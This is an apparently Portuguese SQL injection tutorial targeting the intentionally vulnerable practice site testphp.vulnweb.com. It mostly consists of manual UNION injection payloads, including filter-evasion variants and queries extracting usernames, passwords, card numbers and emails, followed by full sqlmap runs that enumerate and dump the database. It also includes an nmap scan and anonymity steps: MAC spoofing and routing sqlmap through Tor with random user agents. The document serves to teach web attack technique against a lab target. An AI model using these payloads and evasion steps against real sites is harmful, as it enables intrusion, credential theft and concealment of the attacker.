1,2,3,4,5,6,7,8,9,10,11-- - http://testphp.vulnweb.com/listproducts.php?cat=3 union all select1,2,3,4,5,6,'<< Coluna 7 esta vulneravel >>',8,9,10,11-- - http://testphp.vulnweb.com/listproducts.php?cat=3 and 1 = 0 union select 1,2,3,4,5,6,version(),8,9,10,11-- - Vuln columns:7 and 11 http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,version(),8,9,10,user() http://testphp.vulnweb.com/listproducts.php?cat=3 /*!50000%55nIoN*/ /*!50000%53eLeCt*/ 1,2,3,4,5,6,7,8,9,10,11-- - http://testphp.vulnweb.com/listproducts.php?cat=3 /**//*!12345UNION SELECT*//**/ 1,2,3,4,5,6,7,8,9,10,11-- - http://testphp.vulnweb.com/listproducts.php?cat=3 /*--*/union/*--*/select/*--*/ 1,2,3,4,5,6,7,8,9,10,11-- - http://testphp.vulnweb.com/listproducts.php?cat=3 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4,5,6,7,8,9,10,11-- - http://testphp.vulnweb.com/listproducts.php?cat=3 /**/union/*!50000select*//**/ 1,2,3,4,5,6,7,8,9,10,11-- - http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 from information_schema.columns where table_schema=database() and table_name='users'--+ http://testphp.vulnweb.com/listproducts.php?cat=-1 union all select 1,group_concat('User : ',uname,' Password: ',pass, ' Phone: ',cc,' Email: ',email),3,4,5,6,7,8,9,10,11 from users--+ http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8', 'vuln9','vuln10','vuln11' Vuln column: 1 3 7 9 http://testphp.vulnweb.com/product.php?pic=-1 and 1 = 0 union select 1,'Vuln 2','Vuln 3',4,5,6,'Vuln 7',8,'Vuln 9',10,11-- http://testphp.vulnweb.com/product.php?pic=-1 and 1 = 0 union select 1,version(),user(),4,5,6,'Vuln 7===',8,database(),10,11-- http://testphp.vulnweb.com/artists.php?artist=100 union select 1,2,(select count(table_name) from information_schema.tables) http://testphp.vulnweb.com/product.php?pic=-1 and 1 = 0 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 115)-- http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,concat(uname,0x3a,pass,0x3a,email,0x3a,name),8,9,10,11 from users
O kali Linux e um sistema operacional (OS) avançado com varias ferramentas para testes de seguranças ( Teste de Penetração ), esses testes são feitos para descobrir falhas em sistemas operacionais, redes, internet e vários outros... ele é totalmente baseado no Debian, que é outro sistema operacional também derivado do linux. Seu antecessor foi o BackTrack Linux. O Kali Linux foi o renascimento do Backtrack, o novo Kali Linux veio com a proposta de ser a mais robusta, avançada e estável distribuição para testes de invasão, disponibilizando mais de 300 ferramentas e um kernel modificado, sendo também completamente customizável. Vamos baixar o Kali para fazermos os exemplos de Injeção manual agora com a ferramenta sqlmap do Kali. https://www.kali.org/ https://www.kali.org/downloads/
Downloading Kali Linux image file ( iso )
Watch the step by step movie showing how to install Kali on your VirtualBox. I have already shown the step by step installation of Linux Debian so it it exactly the same way with Kali. :) Username: root
Password: 123
Clique no icone no lado esquerdo para abrir o terminal.Se preferir acessar o terminal via putty ou terminal do mac então precisaremos iniciar o serviço do ssh. service ssh start ( enter ) Se usar o terminal do Kali não precisaremos usar a linha acima. ifconfig ( enter )
Atualizando o sistema. apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y ( enter ) Vamos inicar o servico do ssh para acessarmos via putty ou terminal mac. service ssh start ( enter )
Agora vamos reproduzir o exemplo da "Injeção Manual de SQL" usando a ferramenta sqlmap do Kali Linux. SqlMap O SQLMAP é uma ferramenta de injeção SQL desenvolvida em Python, seu objetivo é detectar e explorar vulnerabilidades de injeção SQL em aplicações ou sites web, uma vez que se detecta uma ou mais injeções de SQL em um alvo, o usuário pode escolher entre uma variedade de opções que o SQLMAP disponibiliza para explorar os dados armazenados dentro do banco de dados deste sistema ou site, tais como, extrair a lista de usuários, senhas, privilégios, tabelas e muito mais.. ---------------------------------------------- Lei 12.737/2012 no Art. 154-A Invadir dispositivo informático alheio, conectado ou não à rede de computadores, mediante violação indevida de mecanismo de segurança e com o fim de obter, adulterar ou destruir dados ou informações sem autorização expressa ou tácita do titular do dispositivo ou instalar vulnerabilidades para obter vantagem ilícita: Pena – detenção, de 3 (três) meses a 1 (um) ano, e multa. Lei Nº 12.737, de 30 de novembro de 2012. ---------------------------------------------- No terminal no Kali digite os comandos abaixo para mudar o mac address. ifconfig eth0 down macchanger -m 02:33:4A:B5:6C:D7 eth0 Permanent MAC: e8:94:f6:1c:0e:8b (unknown) Current MAC: 02:33:4a:b5:6c:e7 (unknown) New MAC: 02:33:4a:b5:6c:d7 (unknown) ifconfig eth0 up Na prática...---------------------------------------------- Vamos vamos usar o ferramenta do Kali Linux chamada de sqlmap para acharmos as vulnerabilidades de injeção de sql. sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 21:25:44 [21:25:45] [INFO] testing connection to the target URL [21:25:46] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS [21:25:46] [INFO] testing if the target URL is stable [21:25:47] [INFO] target URL is stable [21:25:47] [INFO] testing if GET parameter 'artist' is dynamic [21:25:47] [INFO] confirming that GET parameter 'artist' is dynamic [21:25:48] [INFO] GET parameter 'artist' is dynamic [21:25:48] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be injectable (possible DBMS: 'MySQL') [21:25:48] [INFO] testing for SQL injection on GET parameter 'artist' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y [21:25:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [21:26:02] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable [21:26:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' [21:26:02] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' [21:26:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [21:26:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [21:26:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [21:26:04] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [21:26:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [21:26:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)' [21:26:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [21:26:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)' [21:26:06] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' [21:26:06] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause' [21:26:07] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' [21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' [21:26:09] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' [21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' [21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' [21:26:10] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)' [21:26:10] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' [21:26:11] [INFO] testing 'MySQL inline queries' [21:26:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' [21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)' [21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)' [21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries' [21:26:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [21:26:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [21:26:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' [21:26:24] [INFO] GET parameter 'artist' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable [21:26:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [21:26:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [21:26:26] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [21:26:27] [INFO] target URL appears to have 3 columns in query [21:26:33] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests: --- Parameter: artist (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: artist=1 AND 5701=5701 Type: AND/OR time-based blind Title:MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271, 0x574756745364796459485666754f467445594851666976445952435075617 06e624d42526f597a73,0x7171786271)-- - --- [21:26:43] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5.0.12 [21:26:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at 21:26:43 ---------------------------------------------- Vamos listar os bancos de dados. --dbs = lista bancos de dados sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 21:59:28 [21:59:28] [INFO] resuming back-end DBMS 'mysql' [21:59:29] [INFO] testing connection to the target URL [21:59:30] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS sqlmap resumed the following injection point(s) from stored session: --- Parameter: artist (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: artist=1 AND 5701=5701 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271, 0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73, 0x7171786271)-- - --- [21:59:30] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5.0.12 [21:59:30] [INFO] fetching database names [21:59:30] [INFO] the SQL query used returns 2 entries [21:59:30] [INFO] resumed: information_schema [21:59:30] [INFO] resumed: acuart available databases [2]: [*] acuart [*] information_schema [21:59:30] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at 21:59:30 ---------------------------------------------- -D = acuart ( banco de dados ) --tables = lista tabelas ---------------------------------------------- Listando todas as tabelas do banco de dados acuart. sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 22:02:11 [22:02:11] [INFO] resuming back-end DBMS 'mysql' [22:02:11] [INFO] testing connection to the target URL [22:02:14] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS sqlmap resumed the following injection point(s) from stored session: --- Parameter: artist (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: artist=1 AND 5701=5701 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271, 0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73, 0x7171786271)-- - --- [22:02:15] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5.0.12 [22:02:15] [INFO] fetching tables for database: 'acuart' [22:02:15] [INFO] the SQL query used returns 8 entries [22:02:15] [INFO] resumed: artists [22:02:15] [INFO] resumed: carts [22:02:15] [INFO] resumed: categ [22:02:15] [INFO] resumed: featured [22:02:15] [INFO] resumed: guestbook [22:02:15] [INFO] resumed: pictures [22:02:15] [INFO] resumed: products [22:02:15] [INFO] resumed: users Database: acuart [8 tables] +-----------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | products | | users | +-----------+ [22:02:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at 22:02:15 ---------------------------------------------- Listando todas as tabelas e campos do banco de dados acuart. --tables = lista tabelas --columns = lista colunas ---------------------------------------------- sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --columns _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 22:15:25 [22:15:25] [INFO] resuming back-end DBMS 'mysql' [22:15:25] [INFO] testing connection to the target URL [22:15:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS sqlmap resumed the following injection point(s) from stored session: --- Parameter: artist (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: artist=1 AND 5701=5701 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271, 0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73, 0x7171786271)-- - --- [22:15:27] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5.0.12 [22:15:27] [INFO] fetching tables for database: 'acuart' [22:15:27] [INFO] the SQL query used returns 8 entries [22:15:27] [INFO] resumed: artists [22:15:27] [INFO] resumed: carts [22:15:27] [INFO] resumed: categ [22:15:27] [INFO] resumed: featured [22:15:27] [INFO] resumed: guestbook [22:15:27] [INFO] resumed: pictures [22:15:27] [INFO] resumed: products [22:15:27] [INFO] resumed: users Database: acuart [8 tables] +-----------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | products | | users | +-----------+ [22:15:27] [INFO] fetching columns for table 'artists' in database 'acuart' [22:15:27] [INFO] the SQL query used returns 3 entries [22:15:27] [INFO] resumed: "artist_id","int(5)" [22:15:27] [INFO] resumed: "aname","varchar(50)" [22:15:27] [INFO] resumed: "adesc","text" [22:15:27] [INFO] fetching columns for table 'carts' in database 'acuart' [22:15:27] [INFO] the SQL query used returns 3 entries [22:15:27] [INFO] resumed: "cart_id","varchar(100)" [22:15:27] [INFO] resumed: "price","int(11)" [22:15:27] [INFO] resumed: "item","int(11)" [22:15:27] [INFO] fetching columns for table 'categ' in database 'acuart' [22:15:27] [INFO] the SQL query used returns 3 entries [22:15:27] [INFO] resumed: "cat_id","int(5)" [22:15:27] [INFO] resumed: "cname","varchar(50)" [22:15:27] [INFO] resumed: "cdesc","tinytext" [22:15:27] [INFO] fetching columns for table 'featured' in database 'acuart' [22:15:27] [INFO] the SQL query used returns 2 entries [22:15:27] [INFO] resumed: "pic_id","int(11)" [22:15:27] [INFO] resumed: "feature_text","text" [22:15:27] [INFO] fetching columns for table 'guestbook' in database 'acuart' [22:15:27] [INFO] the SQL query used returns 3 entries [22:15:27] [INFO] resumed: "sender","varchar(150)" [22:15:27] [INFO] resumed: "mesaj","text" [22:15:27] [INFO] resumed: "senttime","int(32)" [22:15:27] [INFO] fetching columns for table 'pictures' in database 'acuart' [22:15:27] [INFO] the SQL query used returns 8 entries [22:15:27] [INFO] resumed: "pic_id","int(5)" [22:15:27] [INFO] resumed: "pshort","mediumtext" [22:15:27] [INFO] resumed: "plong","text" [22:15:27] [INFO] resumed: "price","int(11)" [22:15:27] [INFO] resumed: "cat_id","int(11)" [22:15:27] [INFO] resumed: "a_id","int(11)" [22:15:27] [INFO] resumed: "title","varchar(100)" [22:15:27] [INFO] resumed: "img","varchar(50)" [22:15:27] [INFO] fetching columns for table 'products' in database 'acuart' [22:15:27] [INFO] the SQL query used returns 5 entries [22:15:27] [INFO] resumed: "id","int(10) unsigned" [22:15:27] [INFO] resumed: "name","text" [22:15:27] [INFO] resumed: "rewritename","text" [22:15:27] [INFO] resumed: "description","text" [22:15:27] [INFO] resumed: "price","int(10) unsigned" [22:15:27] [INFO] fetching columns for table 'users' in database 'acuart' [22:15:27] [INFO] the SQL query used returns 8 entries [22:15:27] [INFO] resumed: "uname","varchar(100)" [22:15:27] [INFO] resumed: "pass","varchar(100)" [22:15:27] [INFO] resumed: "cc","varchar(100)" [22:15:27] [INFO] resumed: "address","mediumtext" [22:15:27] [INFO] resumed: "email","varchar(100)" [22:15:27] [INFO] resumed: "name","varchar(100)" [22:15:27] [INFO] resumed: "phone","varchar(100)" [22:15:27] [INFO] resumed: "cart","varchar(100)" Database: acuart Table: categ [3 columns] +--------+-------------+ | Column | Type | +--------+-------------+ | cat_id | int(5) | | cdesc | tinytext | | cname | varchar(50) | +--------+-------------+ Database: acuart Table: users [8 columns] +---------+--------------+ | Column | Type | +---------+--------------+ | address | mediumtext | | cart | varchar(100) | | cc | varchar(100) | | email | varchar(100) | | name | varchar(100) | | pass | varchar(100) | | phone | varchar(100) | | uname | varchar(100) | +---------+--------------+ Database: acuart Table: carts [3 columns] +---------+--------------+ | Column | Type | +---------+--------------+ | cart_id | varchar(100) | | item | int(11) | | price | int(11) | +---------+--------------+ Database: acuart Table: pictures [8 columns] +--------+--------------+ | Column | Type | +--------+--------------+ | a_id | int(11) | | cat_id | int(11) | | img | varchar(50) | | pic_id | int(5) | | plong | text | | price | int(11) | | pshort | mediumtext | | title | varchar(100) | +--------+--------------+ Database: acuart Table: featured [2 columns] +--------------+---------+ | Column | Type | +--------------+---------+ | feature_text | text | | pic_id | int(11) | +--------------+---------+ Database: acuart Table: products [5 columns] +-------------+------------------+ | Column | Type | +-------------+------------------+ | description | text | | id | int(10) unsigned | | name | text | | price | int(10) unsigned | | rewritename | text | +-------------+------------------+ Database: acuart Table: artists [3 columns] +-----------+-------------+ | Column | Type | +-----------+-------------+ | adesc | text | | aname | varchar(50) | | artist_id | int(5) | +-----------+-------------+ Database: acuart Table: guestbook [3 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | mesaj | text | | sender | varchar(150) | | senttime | int(32) | +----------+--------------+ [22:15:27] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at 22:15:27 ---------------------------------------------- Listando o conteúdo dos dois campos, uname and pass ( username e password ) :) -D acuart = banco de dados -T users = tabela ( de usuarios ) -C uname,pass = listara os 2 campos ( usuario e senha ) --dump = mostra os dados ---------------------------------------------- Digite o comando abaixo em uma única linha. sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users -C uname,pass --dump _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 22:26:26 [22:26:26] [INFO] resuming back-end DBMS 'mysql' [22:26:26] [INFO] testing connection to the target URL [22:26:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS sqlmap resumed the following injection point(s) from stored session: --- Parameter: artist (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: artist=1 AND 5701=5701 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271, 0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73, 0x7171786271)-- - --- [22:26:27] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5.0.12 [22:26:27] [INFO] fetching entries of column(s) 'pass, uname' for table 'users' in database 'acuart' [22:26:27] [INFO] the SQL query used returns 1 entries [22:26:27] [INFO] retrieved: "test","test" [22:26:27] [INFO] analyzing table dump for possible password hashes Database: acuart Table: users [1 entry] +-------+------+ | uname | pass | +-------+------+ | test | test | +-------+------+ [22:26:27] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv' [22:26:27] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at 22:26:27 ---------------------------------------------- Veja acima o usuário e a senha purto texto super secreta... :) Abaixo vamos testar o acesso no site...
Acessando os dados...
---------------------------------------------- sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-user _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 22:43:27 [22:43:27] [INFO] resuming back-end DBMS 'mysql' [22:43:27] [INFO] testing connection to the target URL [22:43:28] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS sqlmap resumed the following injection point(s) from stored session: --- Parameter: artist (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: artist=1 AND 5701=5701 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271, 0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73, 0x7171786271)-- - --- [22:43:28] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5.0.12 [22:43:28] [INFO] fetching current user current user: 'acuart@localhost' [22:43:28] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at 22:43:28 ---------------------------------------------- sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --users _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 22:45:09 [22:45:10] [INFO] resuming back-end DBMS 'mysql' [22:45:10] [INFO] testing connection to the target URL [22:45:10] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS sqlmap resumed the following injection point(s) from stored session: --- Parameter: artist (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: artist=1 AND 5701=5701 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271, 0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73, 0x7171786271)-- - --- [22:45:11] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5.0.12 [22:45:11] [INFO] fetching database users [22:45:11] [INFO] the SQL query used returns 1 entries [22:45:11] [INFO] retrieved: 'acuart'@'localhost' database management system users [1]: [*] 'acuart'@'localhost' [22:45:11] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at 22:45:11 ---------------------------------------------- Verificando portas abertas. nmap -sS -P0 -sV -O testphp.vulnweb.com Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-06-12 22:57 EDT Nmap scan report for testphp.vulnweb.com (176.28.50.165) Host is up (0.25s latency). rDNS record for 176.28.50.165: rs202995.rs.hosteurope.de Not shown: 985 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.3e 22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7.1 (Ubuntu Linux; protocol 2.0) 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND none 80/tcp open http nginx 1.4.1 106/tcp open pop3pw poppassd 110/tcp open pop3 Courier pop3d 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 143/tcp open imap Plesk Courier imapd 445/tcp filtered microsoft-ds 465/tcp open ssl/smtp Postfix smtpd 993/tcp open ssl/imap Plesk Courier imapd 995/tcp open ssl/pop3 Courier pop3d 8443/tcp open http lighttpd Aggressive OS guesses: Linux 2.6.32 (89%), QNAP NAS Firmware 3.8.3 (Linux 3.X) (87%), IPFire firewall 2.11 (Linux 2.6.32) (87%), D-Link DSL-2890AL ADSL router (87%), IPCop 1.9.19 or IPFire firewall 2.9 (Linux 2.6.32) (87%), OpenWrt Kamikaze 8.09 (Linux 2.6.25.20) (87%), Linux 2.6.36 (87%), Linux 3.2.1 (86%), Linux 2.6.35 (86%), Check Point ZoneAlarm Z100G firewall (85%) No exact OS matches for host (test conditions non-ideal). Service Info: Hosts: rs202995.rs.hosteurope.de, localhost.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 72.11 seconds ---------------------------------------------- *** Digite o comando abaixo em um única linha: sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --time-sec=3 --threads=3 --technique=BEUS --random-agent --no-cast --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050 _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201603300a89} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 12:15:09 [12:15:09] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19' [12:15:09] [INFO] testing connection to the target URL [12:15:14] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS [12:15:14] [INFO] testing if the target URL is stable [12:15:15] [INFO] target URL is stable [12:15:15] [INFO] testing if GET parameter 'artist' is dynamic [12:15:15] [INFO] confirming that GET parameter 'artist' is dynamic [12:15:15] [INFO] GET parameter 'artist' is dynamic [12:15:15] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be injectable (possible DBMS: 'MySQL') [12:15:16] [INFO] testing for SQL injection on GET parameter 'artist' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y [12:15:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [12:15:20] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 